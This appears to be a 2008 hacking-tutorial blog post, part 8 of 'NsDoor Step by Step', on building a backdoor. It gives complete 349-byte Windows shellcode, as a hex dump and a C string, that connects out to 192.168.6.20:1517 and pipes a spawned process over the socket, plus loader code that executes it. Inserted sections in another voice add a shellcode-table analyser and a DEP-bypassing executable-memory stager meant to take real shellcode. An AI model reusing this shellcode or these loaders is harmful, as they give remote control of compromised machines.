NsDoor Step by Step (8)
The assembly was written in the earlier parts, so how do we get the shellcode out of it? There are plenty of methods online.
Anyone who knows assembly will think of the simplest one: copy the bytes straight out of the code segment in memory. I used the most laborious method of all, copying them a few at a time while stepping through the disassembly...
Embarrassing.
As before, open the debugger's Disassembly window
and tick the option that shows the code bytes:
Code Bytes
See? The machine code appears next to each instruction. Copy it all out in one piece....
Neat, huh?
B8 55 6A A2 71 89 45 04 B8 11 42 A2 71 89 45 08 B8 27 D8 81 7C 89 45 0C B8 6F 67 A2 71 89 45 10
B8 46 24 80 7C 89 45 14 B8 35 24 92 7C 89 45 18 B8 6B 23 80 7C 89 45 1C B8 07 4A A2 71 89 45 20
B8 27 4C A2 71 89 45 24 B8 12 18 80 7C 89 45 28 C6 45 38 00 C6 45 3C 00 C6 45 50 00 81 EC 90 01
00 00 54 68 02 02 00 00 FF 55 04 6A 06 6A 01 6A 02 FF 55 08 8B D8 68 C0 A8 06 14 B8 02 00 05 ED
50 8B F4 6A 10 56 53 FF 55 20 83 F8 FF 74 E7 6A 01 6A 00 6A 0C 8B C4 6A 00 50 8D 45 3C 50 8D 45
38 50 FF 55 0C 68 8C 0F 00 00 68 8C 0F 00 00 6A 00 6A 00 6A 00 68 01 01 00 00 6A 00 6A 00 6A 00
6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8B FC 6A 00 68 C8 00 00 00 8D 85 34 FB FF FF 50
53 FF 55 10 68 64 95 96 7C 68 44 D1 98 7C 6A FF 68 68 D1 98 7C 8B C4 50 57 6A 00 6A 00 6A 00 6A
01 6A 00 6A 00 8D 85 34 FB FF FF 50 6A 00 FF 55 1C 83 F8 00 74 CE 68 E8 03 00 00 FF 55 14 57 68
00 04 00 00 8D 85 35 FB FF FF 50 FF 75 38 FF 55 28 68 00 04 00 00 6A 00 8D 85 35 FB FF FF 50 FF
55 18 6A 64 FF 55 14 68 C8 00 00 00 6A 00 8D 85 34 FB FF FF 50 FF 55 18 E9 75 FF FF FF
That is 349 bytes in total.
Then turn it into the form a C string literal accepts, i.e. put \x in front of every byte. The escape is a backslash: with a forward slash, "/xB8" is four ordinary characters, the array would hold text rather than machine code, and the call below would crash.
\xB8\x55\x6A\xA2\x71\x89\x45\x04\xB8\x11\x42\xA2\x71\x89\x45\x08\xB8\x27\xD8\x81\x7C\x89\x45\x0C\xB8\x6F\x67\xA2\x71\x89\x45\x10
\xB8\x46\x24\x80\x7C\x89\x45\x14\xB8\x35\x24\x92\x7C\x89\x45\x18\xB8\x6B\x23\x80\x7C\x89\x45\x1C\xB8\x07\x4A\xA2\x71\x89\x45\x20
\xB8\x27\x4C\xA2\x71\x89\x45\x24\xB8\x12\x18\x80\x7C\x89\x45\x28\xC6\x45\x38\x00\xC6\x45\x3C\x00\xC6\x45\x50\x00\x81\xEC\x90\x01
\x00\x00\x54\x68\x02\x02\x00\x00\xFF\x55\x04\x6A\x06\x6A\x01\x6A\x02\xFF\x55\x08\x8B\xD8\x68\xC0\xA8\x06\x14\xB8\x02\x00\x05\xED
\x50\x8B\xF4\x6A\x10\x56\x53\xFF\x55\x20\x83\xF8\xFF\x74\xE7\x6A\x01\x6A\x00\x6A\x0C\x8B\xC4\x6A\x00\x50\x8D\x45\x3C\x50\x8D\x45
\x38\x50\xFF\x55\x0C\x68\x8C\x0F\x00\x00\x68\x8C\x0F\x00\x00\x6A\x00\x6A\x00\x6A\x00\x68\x01\x01\x00\x00\x6A\x00\x6A\x00\x6A\x00
\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x8B\xFC\x6A\x00\x68\xC8\x00\x00\x00\x8D\x85\x34\xFB\xFF\xFF\x50
\x53\xFF\x55\x10\x68\x64\x95\x96\x7C\x68\x44\xD1\x98\x7C\x6A\xFF\x68\x68\xD1\x98\x7C\x8B\xC4\x50\x57\x6A\x00\x6A\x00\x6A\x00\x6A
\x01\x6A\x00\x6A\x00\x8D\x85\x34\xFB\xFF\xFF\x50\x6A\x00\xFF\x55\x1C\x83\xF8\x00\x74\xCE\x68\xE8\x03\x00\x00\xFF\x55\x14\x57\x68
\x00\x04\x00\x00\x8D\x85\x35\xFB\xFF\xFF\x50\xFF\x75\x38\xFF\x55\x28\x68\x00\x04\x00\x00\x6A\x00\x8D\x85\x35\xFB\xFF\xFF\x50\xFF
\x55\x18\x6A\x64\xFF\x55\x14\x68\xC8\x00\x00\x00\x6A\x00\x8D\x85\x34\xFB\xFF\xFF\x50\xFF\x55\x18\xE9\x75\xFF\xFF\xFF
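Counting and re-escaping 349 bytes by hand is where copy errors creep in, so here is an added checker (my code, not the post's) that does the work above mechanically. It parses the space-separated dump, rejects any token that is not exactly two hex digits, emits the \x form, and then uses two facts visible in the listing: the shellcode begins with a run of mov eax, imm32 / mov [ebp+disp8], eax pairs (B8 .. 89 45 dd) that fill a table of absolute API addresses at [ebp+04] through [ebp+28], and every API call goes through that table as call [ebp+disp8] (FF 55 dd). Scanning for those two byte patterns (a pattern scan, not a disassembler, which is enough for a listing this small) lists each slot with the number of call sites that use it. One thing the scan turns up: slot [ebp+24] is filled with 0x71A24C27, a ws2_32 address, but no FF 55 24 occurs anywhere in the listing, so whatever that slot was meant for never runs; if it is send, that would fit the "connects but rarely returns data" result reported at the end of the post. The listing embedded in the program is the one above, copied verbatim.

```c
/* Added example, not code from the NsDoor post: parse a hand-copied hex dump,
 * emit it as a \x-escaped C string body, and map the shellcode's own
 * pointer-table structure.  Patterns scanned:
 *   B8 imm32 ; 89 45 dd   mov eax, imm32 ; mov [ebp+dd], eax   (table fill)
 *   FF 55 dd              call [ebp+dd]                        (API call)  */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BYTES 1024

/* Constructed input: the 349-byte listing from this post, copied verbatim. */
static const char NSDOOR_HEX[] =
    "B8 55 6A A2 71 89 45 04 B8 11 42 A2 71 89 45 08 B8 27 D8 81 7C 89 45 0C B8 6F 67 A2 71 89 45 10 "
    "B8 46 24 80 7C 89 45 14 B8 35 24 92 7C 89 45 18 B8 6B 23 80 7C 89 45 1C B8 07 4A A2 71 89 45 20 "
    "B8 27 4C A2 71 89 45 24 B8 12 18 80 7C 89 45 28 C6 45 38 00 C6 45 3C 00 C6 45 50 00 81 EC 90 01 "
    "00 00 54 68 02 02 00 00 FF 55 04 6A 06 6A 01 6A 02 FF 55 08 8B D8 68 C0 A8 06 14 B8 02 00 05 ED "
    "50 8B F4 6A 10 56 53 FF 55 20 83 F8 FF 74 E7 6A 01 6A 00 6A 0C 8B C4 6A 00 50 8D 45 3C 50 8D 45 "
    "38 50 FF 55 0C 68 8C 0F 00 00 68 8C 0F 00 00 6A 00 6A 00 6A 00 68 01 01 00 00 6A 00 6A 00 6A 00 "
    "6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8B FC 6A 00 68 C8 00 00 00 8D 85 34 FB FF FF 50 "
    "53 FF 55 10 68 64 95 96 7C 68 44 D1 98 7C 6A FF 68 68 D1 98 7C 8B C4 50 57 6A 00 6A 00 6A 00 6A "
    "01 6A 00 6A 00 8D 85 34 FB FF FF 50 6A 00 FF 55 1C 83 F8 00 74 CE 68 E8 03 00 00 FF 55 14 57 68 "
    "00 04 00 00 8D 85 35 FB FF FF 50 FF 75 38 FF 55 28 68 00 04 00 00 6A 00 8D 85 35 FB FF FF 50 FF "
    "55 18 6A 64 FF 55 14 68 C8 00 00 00 6A 00 8D 85 34 FB FF FF 50 FF 55 18 E9 75 FF FF FF";

/* Parse "B8 55 6A ..." into bytes.  Returns the byte count, or -1 on a token
 * that is not exactly two hex digits (the typical hand-copy typo). */
int parse_hex(const char *text, uint8_t *out, int cap)
{
    int n = 0;
    const char *p = text;
    while (*p) {
        while (*p && isspace((unsigned char)*p)) p++;
        if (!*p) break;
        if (!isxdigit((unsigned char)p[0]) || !isxdigit((unsigned char)p[1]) ||
            (p[2] && !isspace((unsigned char)p[2])) || n >= cap)
            return -1;
        char tok[3] = { p[0], p[1], 0 };
        out[n++] = (uint8_t)strtoul(tok, NULL, 16);
        p += 2;
    }
    return n;
}

int shellcode_length(const char *text)
{
    uint8_t b[MAX_BYTES];
    return parse_hex(text, b, MAX_BYTES);
}

/* Re-emit the bytes as a \x-escaped string body (4 characters per byte).
 * Returns the number of characters written, or -1 on parse error / short buffer. */
int escape_hex(const char *text, char *out, size_t cap)
{
    uint8_t b[MAX_BYTES];
    int n = parse_hex(text, b, MAX_BYTES);
    if (n < 0 || cap < (size_t)n * 4 + 1) return -1;
    for (int i = 0; i < n; i++)
        sprintf(out + i * 4, "\\x%02X", b[i]);
    return n * 4;
}

/* Walk the prologue's mov eax, imm32 / mov [ebp+dd], eax pairs and return the
 * absolute address stored in slot `disp`, or 0 if the prologue never fills it. */
uint32_t slot_address(const char *text, int disp)
{
    uint8_t b[MAX_BYTES];
    int n = parse_hex(text, b, MAX_BYTES);
    for (int i = 0; i + 8 <= n; i += 8) {
        if (b[i] != 0xB8 || b[i + 5] != 0x89 || b[i + 6] != 0x45) break;
        uint32_t imm = b[i + 1] | b[i + 2] << 8 | b[i + 3] << 16 | (uint32_t)b[i + 4] << 24;
        if (b[i + 7] == disp) return imm;
    }
    return 0;
}

/* Count call [ebp+disp] (FF 55 dd) sites for one table slot. */
int call_count(const char *text, int disp)
{
    uint8_t b[MAX_BYTES];
    int n = parse_hex(text, b, MAX_BYTES), hits = 0;
    for (int i = 0; i + 3 <= n; i++)
        if (b[i] == 0xFF && b[i + 1] == 0x55 && b[i + 2] == disp) hits++;
    return hits;
}

int main(void)
{
    printf("%d bytes\n", shellcode_length(NSDOOR_HEX));
    for (int d = 0x04; d <= 0x28; d += 4)
        printf("[ebp+%02X] = %08lX  called %d time(s)\n", d,
               (unsigned long)slot_address(NSDOOR_HEX, d), call_count(NSDOOR_HEX, d));
    return 0;
}
```

Build with any C99 compiler and run; it prints the byte count and the ten-slot table. A listing with a one-character token or a stray non-hex letter makes parse_hex return -1 instead of silently producing a shifted shellcode, which is the failure mode a hand-copied dump is most prone to.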
Now that we have the shellcode, what about the rest? We build the program the way one tests any shellcode:
#include <windows.h>

int main()
{
    /* The shellcode's pointer table holds fixed ws2_32 addresses and never
       loads the DLL itself, so it has to be mapped before the call. */
    LoadLibraryA("Ws2_32");
    /* Backslash escapes: "\xB8" is one byte, "/xB8" would be four characters. */
    unsigned char ShellCode[] = "\xB8\x55\x6A\xA2\x71\x89\x45\x04\xB8\x11\x42\xA2\x71\x89\x45\x08\xB8\x27\xD8\x81\x7C\x89\x45\x0C\xB8\x6F\x67\xA2\x71\x89\x45\x10\xB8\x46\x24\x80\x7C\x89\x45\x14\xB8\x35\x24\x92\x7C\x89\x45\x18\xB8\x6B\x23\x80\x7C\x89\x45\x1C\xB8\x07\x4A\xA2\x71\x89\x45\x20\xB8\x27\x4C\xA2\x71\x89\x45\x24\xB8\x12\x18\x80\x7C\x89\x45\x28\xC6\x45\x38\x00\xC6\x45\x3C\x00\xC6\x45\x50\x00\x81\xEC\x90\x01\x00\x00\x54\x68\x02\x02\x00\x00\xFF\x55\x04\x6A\x06\x6A\x01\x6A\x02\xFF\x55\x08\x8B\xD8\x68\xC0\xA8\x06\x14\xB8\x02\x00\x05\xED\x50\x8B\xF4\x6A\x10\x56\x53\xFF\x55\x20\x83\xF8\xFF\x74\xE7\x6A\x01\x6A\x00\x6A\x0C\x8B\xC4\x6A\x00\x50\x8D\x45\x3C\x50\x8D\x45\x38\x50\xFF\x55\x0C\x68\x8C\x0F\x00\x00\x68\x8C\x0F\x00\x00\x6A\x00\x6A\x00\x6A\x00\x68\x01\x01\x00\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x8B\xFC\x6A\x00\x68\xC8\x00\x00\x00\x8D\x85\x34\xFB\xFF\xFF\x50\x53\xFF\x55\x10\x68\x64\x95\x96\x7C\x68\x44\xD1\x98\x7C\x6A\xFF\x68\x68\xD1\x98\x7C\x8B\xC4\x50\x57\x6A\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x00\x6A\x00\x8D\x85\x34\xFB\xFF\xFF\x50\x6A\x00\xFF\x55\x1C\x83\xF8\x00\x74\xCE\x68\xE8\x03\x00\x00\xFF\x55\x14\x57\x68\x00\x04\x00\x00\x8D\x85\x35\xFB\xFF\xFF\x50\xFF\x75\x38\xFF\x55\x28\x68\x00\x04\x00\x00\x6A\x00\x8D\x85\x35\xFB\xFF\xFF\x50\xFF\x55\x18\x6A\x64\xFF\x55\x14\x68\xC8\x00\x00\x00\x6A\x00\x8D\x85\x34\xFB\xFF\xFF\x50\xFF\x55\x18\xE9\x75\xFF\xFF\xFF";
    /* Cast the array to a no-argument, no-return function and call it.  This
       only works while the stack is executable, i.e. with DEP off for this
       process, as it was on the Windows builds the addresses above belong to. */
    ( (void(*)(void)) &ShellCode )();
    return 0;
}
Of course, the line
LoadLibraryA("Ws2_32"); looks optional, but it can only be dropped in a process that already has ws2_32.dll mapped: the shellcode's pointer table holds fixed ws2_32 addresses and nothing in it loads the DLL, so a bare console program like this one needs the call.
I usually call this style "messy code"....
( (void(*)(void)) &ShellCode )();
After all these years of programming, how many people have noticed this?
It casts ShellCode to a pointer to a function that takes no arguments and returns nothing, then calls it. Executing that statement is the same as executing the bytes stored in the ShellCode array. The one condition is that those bytes live in executable memory: a stack array in a 32-bit console program qualified on the Windows builds this was written against, but where DEP/NX is enforced the call faults, and the bytes first have to be copied into (or re-protected as) executable memory.
Function pointers can be used like this!!! And machine code can stand in for the program's code segment. Very good, very powerful, very cooperative (as the Tomato Garden author put it in a cnbeta comment).
And a more normal-looking way:
__asm
{
    lea eax, ShellCode
    call eax
}
lea loads the address of ShellCode into the register and call eax transfers control there (this is MSVC 32-bit inline assembly; the x64 compiler has no __asm). Note that the shellcode ends with a jmp back into its own loop (the E9 75 FF FF FF at the end of the listing), so control never returns to main from either form of the call.
The principle should be clear by now: it is the same as the function-pointer version above....
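Both forms above rely on the stack happening to be executable. The added program below (my code, not the post's) makes the same function-pointer call the way it still works with DEP/NX on: the bytes are copied into a fresh page, the page is switched from read/write to read/execute, and only then is it called. The payload is a constructed stub that just returns 42 (six bytes on x86/x86-64, eight on AArch64), so it can be run safely on a Linux or Windows box; the helper names make_executable, free_executable and run_stub are mine.

```c
/* Added example, not code from the NsDoor post: stage bytes in memory that is
 * first writable and then executable (never both at once), and call them
 * through a function pointer, the same idiom as ( (void(*)(void)) &ShellCode )(). */
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <unistd.h>
#endif

/* Constructed payload (not the NsDoor shellcode): "mov eax, 42 ; ret" on
 * x86/x86-64, "mov w0, #42 ; ret" on AArch64.  Returning a value lets the
 * caller verify that the bytes really ran. */
#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
static const uint8_t STUB[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };
#elif defined(__aarch64__) || defined(_M_ARM64)
static const uint8_t STUB[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 };
#else
#error "no stub encoded for this architecture"
#endif

typedef int (*stub_fn)(void);

/* Round a length up to whole pages; protections apply per page. */
static size_t page_round(size_t len)
{
#ifdef _WIN32
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    size_t page = si.dwPageSize;
#else
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
#endif
    return (len + page - 1) / page * page;
}

/* Copy `code` into fresh read/write memory, then flip it to read/execute.
 * Returns NULL on failure.  This RW -> RX step is what the post's stack
 * array lacks, and why that call faults once DEP is enforced. */
void *make_executable(const uint8_t *code, size_t len)
{
    size_t sz = page_round(len);
#ifdef _WIN32
    DWORD old;
    void *mem = VirtualAlloc(NULL, sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) return NULL;
    memcpy(mem, code, len);
    if (!VirtualProtect(mem, sz, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return NULL;
    }
    FlushInstructionCache(GetCurrentProcess(), mem, len);
#else
    void *mem = mmap(NULL, sz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, code, len);
    if (mprotect(mem, sz, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, sz);
        return NULL;
    }
    /* Required on ARM after writing code; a no-op on x86. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
#endif
    return mem;
}

void free_executable(void *mem, size_t len)
{
#ifdef _WIN32
    (void)len;
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    munmap(mem, page_round(len));
#endif
}

/* Stage the stub, call it through a function pointer, release the page.
 * Returns the stub's value (42), or -1 if staging failed. */
int run_stub(void)
{
    void *mem = make_executable(STUB, sizeof STUB);
    if (!mem) return -1;
    int r = ((stub_fn)mem)();   /* same cast-and-call idiom as the post */
    free_executable(mem, sizeof STUB);
    return r;
}

int main(void)
{
    printf("stub returned %d\n", run_stub());
    return 0;
}
```

The cast from a data pointer to a function pointer is outside strict ISO C but is what every loader and JIT does on these platforms. Dropping real shellcode into STUB is a one-line change; the page-protection dance around it is the part worth keeping.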
Test report:
After extracting the machine code it compiles fine, and testing shows it can connect, but very often no data comes back; I tested for several days without success.
Call it barely usable.
Server side, the shellcode:
Client program:
It connects without any trouble...
----------------by NewSketcher
Time: 080822 21:40